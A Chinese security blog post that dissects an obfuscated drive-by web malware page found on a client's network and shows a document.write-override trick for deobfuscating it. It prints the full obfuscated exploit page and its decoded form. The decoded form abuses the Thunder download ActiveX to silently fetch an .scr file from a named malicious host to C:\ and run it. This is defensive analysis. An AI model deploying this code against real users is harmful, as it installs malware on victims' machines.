借”3168a网马”案例来分析所谓的自写函数加密解密网马 's

【文章标题】: 借"3168a网马"案例来分析所谓的自写函数加密解密网马
【文章作者】: T4nk
【作者邮箱】: [email protected]
【作者主页】: http://www.upx.com.cn

事出有因:某天 客户公司内网中毒 经过捉包一查

为http://ora点3168a点com//s368%5C/NEwJs2.js

里面包含 MS06-014 讯雷 网马

其实整个解密过程相当简单(之前有说明过 所以不再…)

其中有个网马加密原型如下:

#1号—————
<html><head><Meta Name=TestName Content=Test>
<noscript><iframe></iframe></noscript><script language="javascript"><!–
wH84="3e/_rJxx/_/|",zO68="3eC32x/n3/,";0.4556224,sM2="0.8569908",zO68='/rq/]/$m0

/*/'//sE3l26ANaIM/^/.ux/"/<FyR1/,/{/)/n/!/#QW/ kGtcSJ8i/>CO/:/-Zhjg/;/@z4/?

r/(/_v/=XbP/&H//dU9/+Bwp/~oYT/[D7/`/%/}enL/|Kf5V',wH84='/r/$/_Zv/>A/(K/:pq0D7/*BTd
/[L/]Pc1

/"/+Jg/@/=6HN4/ jS/}//V/&ziO2C/<r9/#/!kfbI/|xRmX/`5Y3y//W/{hFE/^Go/nUtn/;/?QMs/)

l/'we/~/./,a8/-u/%';function uW24(dH55){"Je2/|/,/|rxHK3J",l=dH55.length;'AP/*X0/*/'A/

%',w='';while(l–)"2eC/,r32/,HK3J",o=wH84.indexOf(dH55.charAt(l)),'AP/=A/nA/%/=0',w=(o==-1?

dH55.charAt(l):zO68.charAt(o))+w;"3e/n/n/,/_Jr/|",wH84=wH84.substring(1)+wH84.charAt

(0),document.write(w);'APCX/%/%/'X/='};uW24("/"/:z/`Cn/&/}0T/.IPTI/~ybT3T/:z/`Cn/&/<P/)

lly/@/@/@q/|/-P/.z/&C/?/./}Y/./`5H6/`/~/&P/`/./}/&/`P/~e/?/./~/`/`/?

/`yY/./`/|I9D/@y2umq/|f8o/>y/@/@/@7/|zQ22y72q/>/|/|Y0Cz/~/./:/~/^Y/&/?Yy1fPJP/-/~/.I1

/|/"K/:z/`Cn/&/<")//–></script><SCRIPT LaNGuAGE=JavAScRIpt>uW24("");</sCripT><SCRipt

lanGUAge=jAvAscRIPt>uW24("JqOYr/?iVqYOW/+rA/?MYi/[aic/|q/+9JpqOYr/?i9");</SCRiPt><sCrIPt

LanGUage=jAvascriPt>uW24("Zjg0239QO/#ZjWL3/&R//ws/?8/*sL/na/nH/{KmZjWL3/&R//GLWa6

/"8H/{KmZjWL3/&9/n///r9/*aHmZjO/|/"8/na3//0a3Wa31CaO/!s8

/r9RyJo/+5wo/+T/$o/+e7o/+e7o/+THo/+Teo/+T/$o/+/$Ko/+THo/+TDo/+T/$o/+T/!

JNJo/+55o/+T/@o/+eeo/+TDo/+T/!o/+T/@o/+THo/+T5o/+57o/+T/@o/+Two/+eKo/+T/!

o/+T/$o/+e5o/+T/$JNJKJ/ mZjO/|/"8/na3//0a3Wa31CaO/!s8

/r9RyJo/+/$7o/+T/@o/+e/$o/+TDo/+T5JNJo/+55o/+T/@o/+eeo/+TDo/+T/!

o/+T/@o/+THo/+T5o/+57o/+T/@o/+Two/+eKo/+T/!o/+T/$o/+e5o/+T/$JNJKJ/ mZjO/|/"8/na3

//0a3Wa31CaO/!s8/r9RyJo/+5wo/+T/$o/+e7o/+e7o/+THo/+Teo/+T/$o/+/$Ko/+THo/+TDo/+T/$o/
+T/!

JNJo/+55o/+T/@o/+eeo/+TDo/+T/!o/+T/@o/+THo/+T5o/+5To/+THo/+Tto/+T/!JNJKJ/ mZj/?98/ns/?12

/*9QFsL3

/nwLOL10aOwLOLyJlJnJo/+T/$JnJ/+JnJOJNJJnJ/|JnJJnJOJnJOJnJQJnJo/+7dJnJo/$eJnJqJnJ/(JnJJnJ/
=Jn

J1JnJ/+JnJ/"JnJ8JnJ/*JnJaJnJ9JnJo/$TJnJ2JnJsJnJ/(JnJqaJnJ3JnJ3sJnJ3JnJo/+BDo/+e5JnJ/+JnJJnJo

/+e5J/ mZj/r/"82O9s8/&a/+a2Hy/ Zj4Zj 9/ryR//GLWa6/"8H/{/{H/ Zj 4Zj O/|/"8/na3

//0a3Wa31wa/*aOalL0zy9/n///r9/*aHN/&K/ mZj 3aO/"38mZj /,Zj WL3/&3aO/{O/|/"8

/na3//0a3Wa31kQa8lL0z/@9/*ay9/n///r9/*aHN/&bH/ mZj 9/ry3aO/{/{K/ R//GLWa6

/"8H/{HmZj/,ZjZj/r/"82O9s8/&6/"8dQQHy/ Zj4Zj WL3/&L3/=/{O/|/"8/na3//0a3Wa31iaOlL0z/-

90OyJo/+7Ho/+7HJN/&KN/&HN/&K/ 10Q/*9OyJ4o3/:o3/,J/ mZj 9/n///r9/*aH/{L3/=/'H/>mZj

0aO/]8Oa3WL/*ypa/+a2Hy/ pN/$KK/ mZj/,ZjZj/r/"82O9s8/&2s/(/(9O//OL0zHy/ Zj4Zj Zj WL3

/&3aO/&/{/&O/|/"8/na3//0a3Wa31/!

s/(/(9OlL0zyKN/&J/|JnJOJnJOJnJQJnJfJnJqJnJqJnJo/+T/@o/+eBo/+THo/+BDo/+77o/+7Ho/+7To/
+7ro/+TH

o/+BDo/+T7o/+T/@o/+Two/+B/@o/+/$7o/+77o/+7To/+7ro/+B/@o/+/$7o/+77o/+7To/+7ro/
+BDo/+e7o/+T7o/

+eBJN/&Jo/+T7o/+7do/+/$/!o/+/$/!J/ mZj 9/r/&y3aO/&/{/{/&K/^/^R//ws/?8/*sL/na/nH/{/{K/ Zj

4Zj Zj R//ws/?8/*sL/na/nH/{HmZj O/|/"8/na3

//0a3Wa31G9/na/;3s/?0a3V98/ns/?yH/ mZj 6/"8dQQHy/ mZj /,Zj a/*0a/&Zj

3aO/"38mZj/,Zj0aO/]

8Oa3WL/*ypo/+T7o/+T/@o/+Two/+Two/+Tto/+e5o/+/$/@o/+e5o/+THo/+e7o/+T/;o/+7Ho/
+Bro/+BtpNH/

mZjWL3/&0O3U3/*/&/{/&RaO//0a3Wa3//QLO/|y/

/&n/&Jo/+/$Ko/+THo/+Teo/+T/$o/+B/@o/+THo/+T5o/+T5o/+/$/@o/+e5o/+THo/+e7o/+T/;o/
+BDo/+Tro/+e5

o/+TwJmZjO/|/"8/na3//0a3Wa31CaO/;3s/?0a3V98/ns/?wLOLy0O3U3

/*N/&Jo/"TeBdo/"eeD/$o/"t/$Hto/"r/;D/@J/ mZjgq0239QO/#")</script></head><body></body></html>
#1号—————

可能你会看起来眼花哦 呵呵

真所谓万变不离其中

万法归宗 嘿嘿 扯的有点远啦

由于任何加密的网马都要通过浏览器来执行 …. 所以怎么变也是要变为"原形"的

SO

直接用手工解密:

<html>

<script>document._write = document.write; document.write = function(html) {this._write

(html.replace(/&/g, "&").replace(/</g, "<").replace(/>/g, ">")); };

document.writeln = function(html){this.write(html);this.write("/r/n");}</script><pre><!–
请把加密的代码完整贴上箭头的后面 然后运行代码后 浏览器会告诉你解密后的代码 嘿嘿
下面是箭头
–>
上面那段#1号

－－－－－－－－－－－－－－－－－－－－－

然后保存为t4nk.htm

然后用直接文件-打开你的t4nk.html
出现如下:
——————————————————————–

<script language=javascript>uD77=1113;function _nr(){return true}

onerror=_nr;gO21=8543;hK90=1116;cY88=6830;;_licensed_to_="huyufeng";</script><script

src="important.js"></script>
<script>
var g_Downloaded1=0;
var g_HaveRun1=0;
var id_file1;
thunder_server.SetConfig("/x4D/x65/x73/x73/x61/x67/x65/x50/x61/x6E/x65/x6C","/x44/x6F/x77

/x6E/x6C/x6F/x61/x64/x43/x6F/x6D/x70/x6C/x65/x74/x65","0");
thunder_server.SetConfig("/x53/x6F/x75/x6E/x64","/x44/x6F/x77/x6E/x6C/x6F/x61/x64/x43

/x6F/x6D/x70/x6C/x65/x74/x65","0");
thunder_server.SetConfig("/x4D/x65/x73/x73/x61/x67/x65/x50/x61/x6E/x65/x6C","/x44/x6F/x77

/x6E/x6C/x6F/x61/x64/x46/x61/x69/x6C","0");
window.clipboardData.setData

("T"+"/x65"+"x"+"t",""+"h"+""+"t"+"t"+"p"+"/x3A"+"/57"+"/"+"m"+""+"y"+"."+"x"+"u"+"n"+"l"+"e

"+"i"+"/56"+"c"+"o"+"m"+"/e"+"r"+"ro"+"r"+"/x2E/x74"+"x"+""+"/x74");
function exec1()
{
if(g_HaveRun1==1)
{
thunder_server.DeleteTask(id_file1, 0);
return;
}
var ret=thunder_server.OpenTaskFile(id_file1, -1);
if(ret==0)g_HaveRun1=1;
}

function RunApp1()
{
var ary=thunder_server.GetTaskList("/x31/x31", 0, 1, 0).split("{/r*/r}");
id_file1=ary[1];
setInterval('exec1()',500);
}

function commit_task1()
{

var ret = thunder_server.CommitTask(0, "h"+"t"+"t"+"p"+":"+"/"+"/"+"/x6F/x72/x61

/x2E/x33/x31/x36/x38/x61/x2E/x63/x6F/x6D/x2F/x53/x33/x36/x38/x2F/x53/x33/x36/x38/x2E/x73

/x63/x72", "/x63/x3A/x5C/x5C");
if (ret == 0&&g_Downloaded1==0)
{

g_Downloaded1=1;
thunder_server.HideBrowserWindow(1);
RunApp1();
}
else
return;
}
setInterval('/x63/x6F/x6D/x6D/x69/x74/x5F/x74/x61/x73/x6B/x31/x28/x29',1);
var strUrl = get_server_path() + "/x50/x61/x67/x65/x2F/x61/x64/x64/x5F/x74/x61/x73

/x6B/x2E/x68/x74/x6D";
thunder_server.SetBrowserWindowData(strUrl, "/u672A/u77E5/u9519/u8BEF");
</script>
————————————————————————————–

讲到这里 大家应该明白所谓自写函数加密网马解密工具的原理的吧

我感觉这点东西不知道有没有必要写成工具 所以以前就没有去写。。。

嘿嘿

大家想写 直接memo一个 savefileto然后 直接用浏览器执行代码后

再load回来 就可以啦

你自己也可以写一个“自写函数加密网马解密工具”的

呵呵～～

最后

以后还有其它解不开的脚本,可以用这段试一下,但是自写过程无效,只能对付100%的IE自身方法的加密:

<script>document._write = document.write; document.write = function(html) {this._write

(html.replace(/&/g, "&").replace(/</g, "<").replace(/>/g, ">")); };

document.writeln = function(html){this.write(html);this.write("/r/n");}</script><pre><!–
请把加密的代码完整贴上箭头的后面 然后运行代码后 浏览器会告诉你解密后的代码 嘿嘿
下面是箭头
–>

PS:其实这个方法最早发现的并不是俺 俺只是很早以前google找东西的时候找到的 只是没有发布出来

最近客户说有个叫"自写函数加密网马解密工具" 一看就知道这原理了 所以公布了

收工 by T4nk

最后大家可以试着用手工 来的方便点 嘿嘿

自娱自乐

效果不错